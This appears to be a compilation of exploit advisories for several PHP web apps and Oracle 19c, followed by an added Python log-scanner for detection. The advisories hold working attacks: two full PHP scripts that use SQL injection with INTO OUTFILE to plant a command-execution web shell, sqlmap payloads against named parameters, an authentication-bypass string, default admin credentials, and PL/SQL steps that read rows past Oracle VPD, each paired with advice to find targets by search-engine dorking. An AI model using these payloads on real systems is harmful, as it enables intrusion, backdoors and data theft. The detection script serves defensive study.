<pre><code>=============================================================================================================================================<br />| # Title : Beauty Parlour Management System 1.0 php code injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://phpgurukul.com/beauty-parlour-management-system-using-php-and-mysql/ |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking In Google Or Other Search Engine.<br /><br />[+] This payload injects PHP code that contains a back door.<br /><br />[+] Line 16 + 19 Set your Target.<br /><br />[+] save payload as poc.php<br /><br />[+] usage from cmd : C:\www\test>php 1.php<br /><br />[+] payload :<br /><br /><?php<br />// Required libraries<br />function send_request($url, $data) {<br /> $options = [<br /> 'http' => [<br /> 'header' => "Content-Type: application/x-www-form-urlencoded\r\n",<br /> 'method' => 'POST',<br /> 'content' => http_build_query($data),<br /> ]<br /> ];<br /> $context = stream_context_create($options);<br /> return file_get_contents($url, false, $context);<br />}<br /><br />// Set a fixed URL<br />$url = 'http://localhost/bpms/';<br /><br />// Fixed path for the file upload<br />$path = 'C:\www\bpms\uploaded.php';<br />$path = str_replace("\\", "\\\\", $path);<br /><br />// Backdoor payload<br />$backdoor_payload = '<?php if (isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>';<br /><br />// Send a PHP file containing the backdoor<br />$payload = [<br /> 'username' => "admin' union select '" . addslashes($backdoor_payload) . "' into outfile '" . $path . "' -- 'a",<br /> 'password' => 'test',<br /> 'login' => ''<br />];<br />send_request($url . "/admin/index.php", $payload);<br /><br />echo "[+] PHP backdoor uploaded successfully at $path\n";<br /><br />// Execute the uploaded PHP file and test the backdoor<br />$response = file_get_contents($url . "uploaded.php?cmd=whoami");<br />echo "[+] Response from the backdoor (executing 'whoami'): \n$response\n";<br />?><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Apartment Visitor Management System 1.0 php code injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://phpgurukul.com/apartment-visitors-management-system-using-php-and-mysql/ |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking In Google Or Other Search Engine.<br /><br />[+] This payload injects PHP code that contains a back door.<br /><br />[+] Line 16 + 19 Set your Target.<br /><br />[+] save payload as poc.php<br /><br />[+] usage from cmd : C:\www\test>php 1.php<br /><br />[+] payload :<br /><br /><br /><?php<br />// Required libraries<br />function send_request($url, $data) {<br /> $options = [<br /> 'http' => [<br /> 'header' => "Content-Type: application/x-www-form-urlencoded\r\n",<br /> 'method' => 'POST',<br /> 'content' => http_build_query($data),<br /> ]<br /> ];<br /> $context = stream_context_create($options);<br /> return file_get_contents($url, false, $context);<br />}<br /><br />// Set a fixed URL<br />$url = 'http://localhost/avms/';<br /><br />// Fixed path for the file upload<br />$path = 'C:\www\avms\uploaded.php';<br />$path = str_replace("\\", "\\\\", $path);<br /><br />// Backdoor payload<br />$backdoor_payload = '<?php if (isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>';<br /><br />// Send a PHP file containing the backdoor<br />$payload = [<br /> 'username' => "admin' union select '" . addslashes($backdoor_payload) . "' into outfile '" . $path . "' -- 'a",<br /> 'password' => 'test',<br /> 'login' => ''<br />];<br />send_request($url . "/index.php", $payload);<br /><br />echo "[+] PHP backdoor uploaded successfully at $path\n";<br /><br />// Execute the uploaded PHP file and test the backdoor<br />$response = file_get_contents($url . "uploaded.php?cmd=whoami");<br />echo "[+] Response from the backdoor (executing 'whoami'): \n$response\n";<br />?><br /><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Passion Responsive Blogging 1.0 SQL injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |<br />| # Vendor : https://code-projects.org/responsive-blog-site-in-php-with-source-code/ |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking In Google Or Other Search Engine.<br /><br />[+] use payload : /bmacblog/single.php?id=1 <==== inject here <br /><br />[+] E:\sqlmap>python sqlmap.py -u https://www.127.0.0.1.com/bmacblog/single.php?id=1 --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs<br /><br />---<br />Parameter: id (GET)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: id=1' AND 9732=9732-- jEuI<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: id=1' AND (SELECT 2112 FROM(SELECT COUNT(*),CONCAT(0x7176717a71,(SELECT (ELT(2112=2112,1))),0x717a6b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- WxeZ<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: id=1' AND (SELECT 4899 FROM (SELECT(SLEEP(5)))Buaa)-- cfil<br /><br /> Type: UNION query<br /> Title: Generic UNION query (NULL) - 9 columns<br /> Payload: id=-6131' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7176717a71,0x7067554f5a4b435a75514461626d774c4f517045565a5a6d776e6e766276754e43576176794c5974,0x717a6b7071),NULL,NULL,NULL,NULL-- -<br />---<br />[23:52:32] [INFO] the back-end DBMS is MySQL<br />web application technology: Apache<br />back-end DBMS: MySQL >= 5.0 
(MariaDB fork)<br />[23:52:32] [INFO] fetching database names<br />available databases [2]:<br />[*] bmac_blog_admin_db<br />[*] information_schema<br /><br />[+] Login : /blogadmin<br /><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>Title: Breaking Oracle Database VPD (Virtual Private Database) Through DDL Permissions in 19c<br />Product: Database<br />Manufacturer: Oracle<br />Affected Version(s): 19c<br />Tested Version(s): 19c<br />Risk Level: Low<br />Author of Advisory: Emad Al-Mousa<br /><br /><br />*****************************************<br />Vulnerability Details:<br /><br />By design, the VPD security feature prevents any database account that is not granted EXEMPT ACCESS POLICY from viewing the complete database rows within the table, in addition of course to the DBA role, which I am going to tackle at the end.<br /><br />However, this security feature will not protect against accounts with DDL permissions, especially an account granted the following permissions: create any procedure, execute any procedure, select any table.<br /><br />For VPD simulation you can follow steps in this link: https://geodatamaster.com/2024/09/04/oracle-vpd-virtual-private-database-row-level-security-in-19c-and-23ai/<br /><br /><br />*****************************************<br />Proof of Concept (PoC):<br /><br />sqlplus / as sysdba<br /><br />SQL> alter session set container=PDB1;<br /><br />SQL> CREATE USER owoods IDENTIFIED BY owoods<br />DEFAULT TABLESPACE users TEMPORARY TABLESPACE temp;<br /><br />SQL> GRANT connect, resource, create any procedure, execute any procedure, select any table<br />to owoods;<br /><br />SQL> GRANT READ ON sh1.customers TO owoods;<br /><br />SQL> exit;<br /><br />sqlplus owoods/owoods@PDB1<br /><br />SQL> grant read on sh1.orders_tab to public;<br /><br />SQL> CREATE OR REPLACE PROCEDURE MDSYS.fetch_data AS<br />vsql VARCHAR2(4000);<br />BEGIN<br />vsql := 'create table MDSYS.orders_tab_copy2 as select * from sh1.orders_tab ';<br />EXECUTE IMMEDIATE vsql;<br />END;<br />/<br /><br />SQL> exec MDSYS.fetch_data;<br /><br />SQL> select * from MDSYS.orders_tab_copy2;<br /><br /> CUST_NO ORDER_NO<br />---------- ----------<br /> 1234 9876<br /> 5678 5432<br /><br /><br />All rows were successfully extracted from the table (the ones the owoods account has no access to by default).<br /><br />Another important thing to consider is the “DBA” role behaviour: the EXEMPT ACCESS POLICY system privilege is not part of the DBA role, so be careful, because the DBA role implicitly has the GRANT ANY PRIVILEGE system privilege, which enables the DBA account to grant it anyway.<br /><br /><br /><br />*****************************************<br />References:<br />https://docs.oracle.com/en/database/oracle/oracle-database/19/dbseg/using-oracle-vpd-to-control-data-access.html#GUID-7FFB40CB-E421-4FE4-8344-29D91360EFAD<br />https://geodatamaster.com/2024/09/04/oracle-vpd-virtual-private-database-row-level-security-in-19c-and-23ai/<br />https://databasesecurityninja.wordpress.com/2024/09/07/breaking-oracle-database-vpd-virtual-private-database-through-ddl-permissions-in-19c/<br />https://databasesecurityninja.wordpress.com/2024/09/04/oracle-database-exempt-access-policy-not-logged-for-sys-account-in-unified-audit-log-ora_secureconfig/<br /><br /><br /><br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : ppdb v2.4-update 6118-1 SQL injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://drive.usercontent.google.com/download?id=1gnVS8xLA-884e7M8V5dc3_i9qNgrviVq&export=download&authuser=0 |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking In Google Or Other Search Engine.<br /><br />[+] use payload :ppdb/root/del.php?del=-1<br /><br />[+] https://www/127.0.0.1/ppdb/root/del.php?del=-1 <=== inject here<br /><br /><br />[+] <br /> Parameter: del (GET)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: del=-1' AND (SELECT 2786 FROM (SELECT(SLEEP(5)))KDQW) AND 'ycIc'='ycIc<br /><br /> Type: UNION query<br /> Title: Generic UNION query (NULL) - 18 columns<br /> Payload: del=-1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176717671,0x6d616b4e6e5a77776d47757568445253596a6468726f72584c72484851664b46664c455675544252,0x71717a7871)-- -<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
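<p>An added detection example, not part of the advisories above and not code from their authors or the vendors: it scans web access-log lines for the payload shapes quoted in these advisories (boolean tautology, SLEEP, UNION SELECT, INTO OUTFILE, FLOOR(RAND()) and a <code>cmd</code> parameter on a .php file). The log lines, client addresses, timestamps and rule names are constructed for illustration; only the request paths come from the advisories.</p>

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Rules modelled on the payload shapes quoted in the advisories (rule names are ours).
RULES = [
    ("union-select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("time-based-sleep", re.compile(r"\bsleep\s*\(\s*\d+\s*\)", re.I)),
    ("into-outfile", re.compile(r"\binto\s+(out|dump)file\b", re.I)),
    ("boolean-tautology", re.compile(r"'\s*(and|or)\s+(\d+)\s*=\s*\2\b", re.I)),
    ("error-based-floor-rand", re.compile(r"\bfloor\s*\(\s*rand\s*\(", re.I)),
]

# Common log format: client, two ids, [time], "METHOD target protocol", status ...
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*"')

# Constructed sample log (documentation address range, invented timestamps).
SAMPLE_LOG = [
    '203.0.113.5 - - [07/Sep/2024:23:52:30 +0000] "GET /bmacblog/single.php?id=1 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [07/Sep/2024:23:52:31 +0000] "GET /bmacblog/single.php?id=1%27%20AND%209732%3D9732--%20jEuI HTTP/1.1" 200 5120',
    '203.0.113.9 - - [07/Sep/2024:23:52:32 +0000] "GET /bmacblog/single.php?id=1%27%20AND%20(SELECT%204899%20FROM%20(SELECT(SLEEP(5)))Buaa)--%20cfil HTTP/1.1" 200 5120',
    '203.0.113.9 - - [07/Sep/2024:23:52:33 +0000] "GET /ppdb/root/del.php?del=-1%27%20UNION%20ALL%20SELECT%20NULL,NULL--%20- HTTP/1.1" 200 310',
    '203.0.113.9 - - [07/Sep/2024:23:52:40 +0000] "GET /bpms/uploaded.php?cmd=whoami HTTP/1.1" 200 24',
]


def scan_line(line):
    """Return (client, path, [rule names]) for a suspicious request, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    client, target = m.groups()
    parts = urlsplit(target)
    hits = set()
    # parse_qsl percent-decodes once; the extra unquote_plus catches double encoding.
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        decoded = unquote_plus(value)
        for name, rx in RULES:
            if rx.search(decoded):
                hits.add(name)
        # A "cmd" parameter on a PHP file matches the follow-up request in the PoCs.
        if key.lower() == "cmd" and parts.path.lower().endswith(".php"):
            hits.add("command-parameter")
    return (client, parts.path, sorted(hits)) if hits else None


def scan(lines):
    """Scan an iterable of log lines and keep only the flagged requests."""
    return [finding for finding in map(scan_line, lines) if finding is not None]


if __name__ == "__main__":
    for client, path, hits in scan(SAMPLE_LOG):
        print(f"{client} {path} -> {', '.join(hits)}")
```

<p>Injection sent in a POST body, as in the login-form advisories, does not appear in an access log; catching that needs request-body logging or a WAF in front of the application.</p>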
<pre><code>=============================================================================================================================================<br />| # Title : POMS v1.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/php/17375/best-courier-management-system-project-php.html |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking In Google Or Other Search Engine.<br /><br />[+] Insecure Settings : appears to leave a default administrative account in place post installation.<br /><br />[+] use payload : user = admin & pass = admin123<br /><br />[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Pharmacy Management System version 1.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/php/15281/multi-language-pharmacy-management-system-project-source-code.html |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking In Google Or Other Search Engine.<br /><br />[+] Insecure Settings : appears to leave a default administrative account in place post installation.<br /><br />[+] use payload : user = admin & pass = admin123<br /><br />[+] https://www/127.0.0.1/demoocom/admin/?page=user/manage_user&id=8<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : PDF Generator Web Application v1.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/php/15243/pdf-generator-web-app-using-tcpdf-and-phpoop-free-source-code.html |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking In Google Or Other Search Engine.<br /><br />[+] Insecure Settings : appears to leave a default administrative account in place post installation.<br /><br />[+] use payload : user = admin & pass = admin123<br /><br />[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Park Ticketing Project 1.0 Auth By Pass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://phpgurukul.com/wp-content/uploads/2019/12/Park-Ticketing-Management-System-Project.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking In Google Or Other Search Engine.<br /><br />[+] use payload : user&pass = ' or 0=0 ##<br /><br />[+] http://127.0.0.1/ptms/dashboard.php<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Online Travel Agency System v1.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/online-travel-agency-system-using-php.html |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking In Google Or Other Search Engine.<br /><br />[+] Insecure Settings : appears to leave a default administrative account in place post installation.<br /><br />[+] use payload : user = admin & pass = admin<br /><br />[+] https://www/127.0.0.1/165.232.176.12/index.php<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>